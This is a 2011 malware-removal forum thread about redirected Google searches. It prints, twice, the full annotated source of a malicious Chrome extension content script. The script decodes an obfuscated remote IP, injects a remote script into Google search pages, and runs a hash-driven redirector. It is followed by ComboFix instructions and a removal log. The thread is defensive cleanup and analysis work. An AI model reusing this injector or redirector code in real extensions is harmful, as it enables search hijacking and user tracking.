

redirected searches and email problems


Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 5:20 pm

Hi -

things look good –

the Adobe Flash was trashed when the problem began – you asked that I not install new pgms so I am waiting.

I hope we can remove some of the 62 restore points and maybe some of the 628 hidden $xxxx subdirectories from the windows directory. That’s over 2500 files searched during scans.


step 1

C:\install\registryBooster deleted along with all other subdirectories.


step 2

ran SystemLook

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm - Parameters: "/s"

---Files---
contentscript.js --a---- 4308 bytes [04:29 10/06/2011] [14:25 10/06/2011]
manifest.json --a---- 244 bytes [04:29 10/06/2011] [14:25 10/06/2011]

No folders found.

========== contents ==========

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js - Opened succesfully.

// --- Analyst notes: this is the content script of the malicious Chrome extension listed by
// SystemLook above. Comments were added for readers; the code itself is untouched. ---
// Query-string parameters appended to the injected script URL further down. `u=` is a UUID,
// presumably a per-install tracking identifier; the meaning of a/i/s is not shown here.
var cinfo = 'u=bc3188ef-13b7-4ad9-8434-fd8904c0fcea&a=1120&i=160&s=0';
// s1 is the remote script URL, hex-encoded and XOR'ed with the single byte k1 (47 = 0x2f):
// obfuscation, not encryption. _dec(s1, k1) recovers hxxp://74[.]50[.]117[.]107/js/jsc[.]php
// (plain http). digitArray is the lowercase hex alphabet used by toHex().
var s1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f', k1 = 47;var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
var hexv =
{
"00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,
"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,"10":16,"11":17,
"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,
"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,"20":32,"21":33,"22":34,"23":35,
"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,
"2D":45,"2E":46,"2F":47,"30":48,"31":49,"32":50,"33":51,"34":52,"35":53,
"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,
"3F":63,"40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,
"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,"50":80,
"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,
"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,"60":96,"61":97,"62":98,
"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,
"6C":108,"6D":109,"6E":110,"6F":111,"70":112,"71":113,"72":114,"73":115,"74":116,
"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,
"7E":126,"7F":127,"80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,
"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
"90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,
"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,"A0":160,"A1":161,
"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,
"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,"B0":176,"B1":177,"B2":178,"B3":179,
"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,
"BD":189,"BE":190,"BF":191,"C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,
"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,
"CF":207,"D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,
"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,"E0":224,
"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,
"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,"F0":240,"F1":241,"F2":242,
"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,
"FC":252,"FD":253,"FE":254,"FF":255
};

// Turns a byte value (0..255) into the single character with that code, by building a
// "%xx" escape and running it through unescape(). Throws a TypeError when n is undefined,
// which is what decodeHex() passes in for a pair that is not in the hexv table.
function ntos(n)
{
  var hex = n.toString(16);
  var escaped = "%" + (hex.length === 1 ? "0" + hex : hex);
  return unescape(escaped);
}

// Renders n as lowercase hex using the 32-bit two's-complement view (so -1 -> "ffffffff"),
// walking the eight nibbles from most to least significant and skipping leading zeros.
// Relies on the file-level digitArray alphabet. Returns "0" for zero.
function toHex(n)
{
  var out = '';
  var sawNonZero = false;
  for (var shift = 28; shift >= 0; shift -= 4)
  {
    var nibble = (n >> shift) & 0xf;
    if (sawNonZero || nibble !== 0)
    {
      sawNonZero = true;
      out += digitArray[nibble];
    }
  }
  return out === '' ? '0' : out;
}

// Left-pads str with the pad string until it is at least len characters long.
// Strings already at or beyond len are returned unchanged. (The third parameter shadows
// the function name; kept as-is because callers pass it positionally.)
function pad(str, len, pad)
{
  var out = str;
  var missing = len - str.length;
  while (missing > 0)
  {
    out = pad + out;
    missing--;
  }
  return out;
}

// Hex-encodes a string: each UTF-16 code unit is masked to its low byte and written as two
// lowercase hex digits (so characters above 0xff lose their high byte). Not called anywhere
// in this script; it is the inverse of decodeHex() and presumably a leftover from a library.
function encodeHex(str)
{
  var hex = '';
  for (var pos = 0; pos < str.length; pos++)
  {
    var digits = (str.charCodeAt(pos) & 0xff).toString(16);
    hex += digits.length < 2 ? '0' + digits : digits;
  }
  return hex;
}

// Hex-decodes a string back to the raw characters it encodes (first stage of _dec()).
// The "cleanup" line below is sed syntax pasted into a JavaScript RegExp: it matches the
// literal text s/<one non-alphanumeric>//g, and since the input has just been upper-cased
// the lowercase "s" can never match. replace() is also called without a replacement
// argument (a match would become the string "undefined"). In practice the line is a no-op.
function decodeHex(str)
{
str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
var result = "";
var nextchar = "";
// Consume the input two characters at a time and look each pair up in hexv. A pair that is
// not valid hex yields undefined and ntos(undefined) throws; a trailing odd character is
// silently dropped.
for(var i=0; i<str.length; i++)
{
nextchar += str.charAt(i);
if(nextchar.length == 2)
{
result += ntos(hexv[nextchar]);
nextchar = "";
}
}
return result;
}

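// XORs every UTF-16 code unit of str with key and returns the resulting string.
// A single repeating byte is reversible obfuscation, not encryption: with k1 = 47 this is
// all that hides the remote script URL (s1) from a casual read of the file.
// Fix: the original wrote `for(i = 0; ...)` without `var`, leaking `i` as an implicit global
// (and throwing a ReferenceError under strict mode); `i` is now local. Output is unchanged.
function xor(str, key)
{
  var res = "";
  for (var i = 0; i < str.length; ++i)
  {
    res += String.fromCharCode(key ^ str.charCodeAt(i));
  }
  return res;
}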

// Reverses the two-layer obfuscation: hex-decode s, then XOR each character with k.
// Called once, to recover the remote script URL from s1/k1.
function _dec(s,k)
{
  var rawChars = decodeHex(s);
  return xor(rawChars, k);
}


// --- Stage 1: on Google search result pages, pull a remote script into the page. ---
// The hostname test uses unescaped dots (each "." matches any character) and its trailing
// (?:...) group is mandatory, so as written it needs <x>google<x><2-4 letters><x><2-4 letters>:
// hosts such as www.google.co.uk or google.com.au match, a bare www.google.com does not
// (probably an authoring slip; a "?" after the group looks intended).
if ( location.hostname.match(/.google.[a-z]{2,4}(?:.[a-z]{2,4})/) ) {
var m, q;
// Fire only on a real query: path /search with a q= parameter. q is captured but used purely
// as a flag below; the search term itself is not sent, cinfo carries the tracking id instead.
if (
location.pathname == '/search' &&
(m = location.search.match(/[?&]q=([^&]+)/))
) {
q = m[1];
}

if (q) {
// Build <script src=URL?cinfo> from the XOR-obfuscated URL in s1. A <script> element that a
// content script appends to the DOM executes in the page's own JavaScript context, not the
// extension's isolated world, so the remote code gets full control of the results page —
// consistent with the "redirected searches" symptom in this thread. The URL is plain http,
// so the payload could also be altered on the wire.
var s = document.createElement('script');
var src = _dec(s1,k1);
s.src = src + '?'+cinfo;

document.body.appendChild(s);
}

}
// --- Stage 2: fragment-driven redirector. Runs on every page this content script is
// injected into (the manifest's match patterns are not shown in the thread). ---
// If the URL carries #rf=<target>, the top-level window is sent to <target>, which is
// entirely attacker-controlled: an open redirector reachable from any link a victim can be
// made to click. It is also a script-execution path: a javascript: URL assigned to
// top.location.href runs in the page. Note too that m[1] is spliced unescaped into a
// JavaScript string literal inside an injected <script>; whether a `"` in the fragment can
// break out of that literal depends on the browser percent-encoding it in location.hash.
// (`var m` re-declares the global from the block above; harmless with var.)
var m;
if (m=location.hash.match(/^#rf=(.*)/)) {
var s = document.createElement('script');
s.innerHTML = 'top.location.href = "'+m[1]+'";';
document.body.appendChild(s);
}


-= EOF =-

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 5:20 pm

Hi -

things look good –

the Adobe Flash was trashed when the problem began – you asked that I not install new pgms so I am waiting.

I hope we can remove some of the 62 restore points and maybe some of the 628 hidden $xxxx subdirectories from the windows directory. That’s over 2500 files searched during scans.


step 1

C:\install\registryBooster deleted along with all other subdirectories.


step 2

ran SystemLook

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm - Parameters: "/s"

---Files---
contentscript.js --a---- 4308 bytes [04:29 10/06/2011] [14:25 10/06/2011]
manifest.json --a---- 244 bytes [04:29 10/06/2011] [14:25 10/06/2011]

No folders found.

========== contents ==========

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js - Opened succesfully.

// --- Analyst notes: this is the content script of the malicious Chrome extension listed by
// SystemLook above. Comments were added for readers; the code itself is untouched. ---
// Query-string parameters appended to the injected script URL further down. `u=` is a UUID,
// presumably a per-install tracking identifier; the meaning of a/i/s is not shown here.
var cinfo = 'u=bc3188ef-13b7-4ad9-8434-fd8904c0fcea&a=1120&i=160&s=0';
// s1 is the remote script URL, hex-encoded and XOR'ed with the single byte k1 (47 = 0x2f):
// obfuscation, not encryption. _dec(s1, k1) recovers hxxp://74[.]50[.]117[.]107/js/jsc[.]php
// (plain http). digitArray is the lowercase hex alphabet used by toHex().
var s1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f', k1 = 47;var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
var hexv =
{
"00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,
"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,"10":16,"11":17,
"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,
"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,"20":32,"21":33,"22":34,"23":35,
"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,
"2D":45,"2E":46,"2F":47,"30":48,"31":49,"32":50,"33":51,"34":52,"35":53,
"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,
"3F":63,"40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,
"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,"50":80,
"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,
"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,"60":96,"61":97,"62":98,
"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,
"6C":108,"6D":109,"6E":110,"6F":111,"70":112,"71":113,"72":114,"73":115,"74":116,
"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,
"7E":126,"7F":127,"80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,
"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
"90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,
"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,"A0":160,"A1":161,
"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,
"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,"B0":176,"B1":177,"B2":178,"B3":179,
"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,
"BD":189,"BE":190,"BF":191,"C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,
"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,
"CF":207,"D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,
"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,"E0":224,
"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,
"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,"F0":240,"F1":241,"F2":242,
"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,
"FC":252,"FD":253,"FE":254,"FF":255
};

// Turns a byte value (0..255) into the single character with that code, by building a
// "%xx" escape and running it through unescape(). Throws a TypeError when n is undefined,
// which is what decodeHex() passes in for a pair that is not in the hexv table.
function ntos(n)
{
  var hex = n.toString(16);
  var escaped = "%" + (hex.length === 1 ? "0" + hex : hex);
  return unescape(escaped);
}

// Renders n as lowercase hex using the 32-bit two's-complement view (so -1 -> "ffffffff"),
// walking the eight nibbles from most to least significant and skipping leading zeros.
// Relies on the file-level digitArray alphabet. Returns "0" for zero.
function toHex(n)
{
  var out = '';
  var sawNonZero = false;
  for (var shift = 28; shift >= 0; shift -= 4)
  {
    var nibble = (n >> shift) & 0xf;
    if (sawNonZero || nibble !== 0)
    {
      sawNonZero = true;
      out += digitArray[nibble];
    }
  }
  return out === '' ? '0' : out;
}

// Left-pads str with the pad string until it is at least len characters long.
// Strings already at or beyond len are returned unchanged. (The third parameter shadows
// the function name; kept as-is because callers pass it positionally.)
function pad(str, len, pad)
{
  var out = str;
  var missing = len - str.length;
  while (missing > 0)
  {
    out = pad + out;
    missing--;
  }
  return out;
}

// Hex-encodes a string: each UTF-16 code unit is masked to its low byte and written as two
// lowercase hex digits (so characters above 0xff lose their high byte). Not called anywhere
// in this script; it is the inverse of decodeHex() and presumably a leftover from a library.
function encodeHex(str)
{
  var hex = '';
  for (var pos = 0; pos < str.length; pos++)
  {
    var digits = (str.charCodeAt(pos) & 0xff).toString(16);
    hex += digits.length < 2 ? '0' + digits : digits;
  }
  return hex;
}

// Hex-decodes a string back to the raw characters it encodes (first stage of _dec()).
// The "cleanup" line below is sed syntax pasted into a JavaScript RegExp: it matches the
// literal text s/<one non-alphanumeric>//g, and since the input has just been upper-cased
// the lowercase "s" can never match. replace() is also called without a replacement
// argument (a match would become the string "undefined"). In practice the line is a no-op.
function decodeHex(str)
{
str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
var result = "";
var nextchar = "";
// Consume the input two characters at a time and look each pair up in hexv. A pair that is
// not valid hex yields undefined and ntos(undefined) throws; a trailing odd character is
// silently dropped.
for(var i=0; i<str.length; i++)
{
nextchar += str.charAt(i);
if(nextchar.length == 2)
{
result += ntos(hexv[nextchar]);
nextchar = "";
}
}
return result;
}

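// XORs every UTF-16 code unit of str with key and returns the resulting string.
// A single repeating byte is reversible obfuscation, not encryption: with k1 = 47 this is
// all that hides the remote script URL (s1) from a casual read of the file.
// Fix: the original wrote `for(i = 0; ...)` without `var`, leaking `i` as an implicit global
// (and throwing a ReferenceError under strict mode); `i` is now local. Output is unchanged.
function xor(str, key)
{
  var res = "";
  for (var i = 0; i < str.length; ++i)
  {
    res += String.fromCharCode(key ^ str.charCodeAt(i));
  }
  return res;
}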

// Reverses the two-layer obfuscation: hex-decode s, then XOR each character with k.
// Called once, to recover the remote script URL from s1/k1.
function _dec(s,k)
{
  var rawChars = decodeHex(s);
  return xor(rawChars, k);
}


// --- Stage 1: on Google search result pages, pull a remote script into the page. ---
// The hostname test uses unescaped dots (each "." matches any character) and its trailing
// (?:...) group is mandatory, so as written it needs <x>google<x><2-4 letters><x><2-4 letters>:
// hosts such as www.google.co.uk or google.com.au match, a bare www.google.com does not
// (probably an authoring slip; a "?" after the group looks intended).
if ( location.hostname.match(/.google.[a-z]{2,4}(?:.[a-z]{2,4})/) ) {
var m, q;
// Fire only on a real query: path /search with a q= parameter. q is captured but used purely
// as a flag below; the search term itself is not sent, cinfo carries the tracking id instead.
if (
location.pathname == '/search' &&
(m = location.search.match(/[?&]q=([^&]+)/))
) {
q = m[1];
}

if (q) {
// Build <script src=URL?cinfo> from the XOR-obfuscated URL in s1. A <script> element that a
// content script appends to the DOM executes in the page's own JavaScript context, not the
// extension's isolated world, so the remote code gets full control of the results page —
// consistent with the "redirected searches" symptom in this thread. The URL is plain http,
// so the payload could also be altered on the wire.
var s = document.createElement('script');
var src = _dec(s1,k1);
s.src = src + '?'+cinfo;

document.body.appendChild(s);
}

}
// --- Stage 2: fragment-driven redirector. Runs on every page this content script is
// injected into (the manifest's match patterns are not shown in the thread). ---
// If the URL carries #rf=<target>, the top-level window is sent to <target>, which is
// entirely attacker-controlled: an open redirector reachable from any link a victim can be
// made to click. It is also a script-execution path: a javascript: URL assigned to
// top.location.href runs in the page. Note too that m[1] is spliced unescaped into a
// JavaScript string literal inside an injected <script>; whether a `"` in the fragment can
// break out of that literal depends on the browser percent-encoding it in location.hash.
// (`var m` re-declares the global from the block above; harmless with var.)
var m;
if (m=location.hash.match(/^#rf=(.*)/)) {
var s = document.createElement('script');
s.innerHTML = 'top.location.href = "'+m[1]+'";';
document.body.appendChild(s);
}


-= EOF =-

Re: redirected searches and email problems

Unread postby melboy » June 16th, 2011, 5:42 pm

Hi

Thanks.

We'll reset System Restore when we finish up, which shouldn't be long, we're just tying up some necessary loose ends. The hidden Windows directories need to stay.


COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.

If combofix prompts you that an update is available, please allow it to update.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    Folder::
    C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files, which may cause "unpredictable results". Re-enable them as soon as ComboFix has finished.
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 6:25 pm

Hi -

What are the hidden $xxxx subdirectories from the windows directory?

ran ComboFix

ComboFix 11-06-16.01 - admin 06/16/2011 17:47:30.5.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.248 [GMT -4:00]
Running from: c:\documents and settings\admin\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\admin\Desktop\cfscript.txt
AV: AntiVir Desktop *Disabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm
c:\documents and settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js
c:\documents and settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\manifest.json
.
.
((((((((((((((((((((((((( Files Created from 2011-05-16 to 2011-06-16 )))))))))))))))))))))))))))))))
.
.
2011-06-16 07:01 . 2011-06-16 07:05 -------- d-----w- c:\windows\ie8updates
2011-06-15 21:46 . 2011-04-21 13:37 105472 ------w- c:\windows\system32\dllcache\mup.sys
2011-06-15 05:14 . 2011-06-15 05:14 -------- d-----w- c:\program files\Common Files\Java
2011-06-15 05:14 . 2011-06-15 05:14 73728 ----a-w- c:\windows\system32\javacpl.cpl
2011-06-13 06:11 . 2011-06-13 06:11 -------- d-----w- c:\documents and settings\All Users\Application Data\Avira
2011-06-13 06:11 . 2011-04-01 21:07 61960 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2011-06-13 06:11 . 2011-04-01 21:07 137656 ----a-w- c:\windows\system32\drivers\avipbb.sys
2011-06-13 06:11 . 2010-06-17 19:27 45416 ----a-w- c:\windows\system32\drivers\avgntdd.sys
2011-06-13 06:11 . 2010-06-17 19:27 22360 ----a-w- c:\windows\system32\drivers\avgntmgr.sys
2011-06-10 13:07 . 2011-06-16 21:13 -------- d-----w- C:\@malware
2011-06-07 11:47 . 2011-06-07 11:47 -------- d-----w- c:\documents and settings\admin\Application Data\AVG10
2011-06-07 11:36 . 2011-06-07 11:36 -------- d--h--w- c:\documents and settings\All Users\Application Data\Common Files
2011-06-07 11:32 . 2011-06-08 14:00 -------- d-----w- c:\documents and settings\All Users\Application Data\AVG10
2011-06-07 11:32 . 2011-06-08 13:58 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:31 . 2011-06-07 11:31 -------- d-----w- c:\program files\AVG
2011-06-07 11:24 . 2011-06-08 13:59 -------- d-----w- c:\documents and settings\All Users\Application Data\MFAData
2011-06-06 17:09 . 2011-06-08 14:17 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2011-06-06 17:09 . 2011-06-06 17:09 -------- d-----w- c:\program files\AVAST Software
2011-06-06 16:57 . 2011-06-06 17:04 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\admin\Application Data\SUPERAntiSpyware.com
2011-06-05 13:15 . 2011-06-05 13:16 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45 . 2011-06-06 04:57 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 16:32 . 2011-06-04 16:32 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19 . 2011-06-04 15:19 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15 . 2011-06-04 18:56 -------- d-----w- C:\- PDF docs
2011-06-04 14:15 . 2011-06-04 15:15 -------- d-----w- C:\- maps
2011-06-04 13:55 . 2011-06-04 14:04 -------- d-----w- C:\- JW info
2011-06-04 13:55 . 2011-06-04 18:55 -------- d-----w- C:\- money
2011-06-04 13:55 . 2011-06-04 13:55 -------- d-----w- C:\- bank
2011-06-04 13:55 . 2011-06-04 18:57 -------- d-----w- C:\- XL docs
2011-06-04 13:55 . 2011-06-04 19:28 -------- d-----w- C:\- word docs
2011-06-04 13:54 . 2011-06-04 18:51 -------- d-----w- C:\- sounds
2011-06-04 13:53 . 2011-06-04 19:07 -------- d-----w- C:\- powerpoint
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-15 05:14 . 2010-06-23 21:32 472808 ----a-w- c:\windows\system32\deployJava1.dll
2011-06-04 16:09 . 2011-03-22 17:14 107 ----a-w- c:\documents and settings\admin\Application Data\netstat.bat
2011-05-29 13:11 . 2009-09-04 13:59 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-16 13:45 . 2011-05-16 13:45 7040 ----a-w- c:\windows\system32\sabprocenum.sys
2011-05-02 15:31 . 2009-08-15 04:39 692736 ----a-w- c:\windows\system32\inetcomm.dll
2011-04-29 16:19 . 2009-08-15 04:39 456320 ----a-w- c:\windows\system32\drivers\mrxsmb.sys
2011-04-25 16:11 . 2004-08-10 17:51 916480 ----a-w- c:\windows\system32\wininet.dll
2011-04-25 16:11 . 2004-08-10 17:51 43520 ----a-w- c:\windows\system32\licmgr10.dll
2011-04-25 16:11 . 2004-08-10 17:51 1469440 ------w- c:\windows\system32\inetcpl.cpl
2011-04-25 12:01 . 2004-08-10 17:51 385024 ----a-w- c:\windows\system32\html.iec
2011-04-21 13:37 . 2009-08-15 04:39 105472 ----a-w- c:\windows\system32\drivers\mup.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{A1E75A0E-4397-4BA8-BB50-E19FB66890F4}"= "c:\program files\MyAshampoo\tbMyA1.dll" [2010-08-21 2734688]
.
[HKEY_CLASSES_ROOT\clsid\{a1e75a0e-4397-4ba8-bb50-e19fb66890f4}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2011-03-28 281768]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2011-04-08 254696]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"HideShutdownScripts"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^PolderbitS Audio Driver Monitor.lnk]
backup=c:\windows\pss\PolderbitS Audio Driver Monitor.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cdloader]
2010-12-03 12:39 50592 ----a-w- c:\documents and settings\admin\Application Data\mjusbsp\cdloader2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 09:42 15360 ------w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-02-15 23:50 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpybotSD TeaTimer]
2009-03-05 20:07 2260480 --sha-w- c:\program files\Spybot - Search & Destroy\TeaTimer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-05-23 15:00 2424192 ----a-w- c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2010-10-02 15:51 202256 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate Notice Service"=3 (0x3)
"LiveUpdate Notice Ex"=3 (0x3)
"LiveUpdate"=3 (0x3)
"Automatic LiveUpdate Scheduler"=2 (0x2)
"AntiVirService"=2 (0x2)
"AntiVirSchedulerService"=2 (0x2)
"wuauserv"=2 (0x2)
"SBAMSvc"=2 (0x2)
"Browser Defender Update Service"=2 (0x2)
"avast! Antivirus"=2 (0x2)
"WMPNetworkSvc"=3 (0x3)
"VSS"=3 (0x3)
"SysmonLog"=3 (0x3)
"ose"=3 (0x3)
"odserv"=3 (0x3)
"nlsX86cc"=2 (0x2)
"idsvc"=3 (0x3)
"gupdatem"=3 (0x3)
"gupdate"=2 (0x2)
"DfSdkS"=3 (0x3)
"Apple Mobile Device"=3 (0x3)
"SBPIMSvc"=2 (0x2)
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
